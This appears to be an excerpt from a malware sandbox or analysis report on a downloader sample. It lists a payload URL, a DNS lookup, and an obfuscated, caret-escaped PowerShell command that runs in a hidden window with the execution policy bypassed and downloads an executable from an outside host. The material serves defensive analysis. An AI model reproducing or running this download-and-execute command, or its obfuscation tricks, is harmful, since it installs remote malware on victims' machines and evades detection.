Technical Information
- http://zonexxopera.top/read.php?f=0.dat as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "powerSH^Ell.^e^xE -exEC^UTION^Po^Li^cy bYpA^sS ^-N^o^pR^OfIl^E -^W^INDOWs^tyle^ ^HIDdEN ^(^n^Ew-O^bj^e^CT ^SY^S^te^M.^Ne^t^.^wEbCli^EnT^).^D^oW^nloAd^fILe('http://zonexxopera.top/read.p...
- DNS ASK zo###xopera.top
- '<SYSTEM32>\cmd.exe' /c "powerSH^Ell.^e^xE -exEC^UTION^Po^Li^cy bYpA^sS ^-N^o^pR^OfIl^E -^W^INDOWs^tyle^ ^HIDdEN ^(^n^Ew-O^bj^e^CT ^SY^S^te^M.^Ne^t^.^wEbCli^EnT^).^D^oW^nloAd^fILe('http://zonexxopera.top/read.p...' (with hidden window)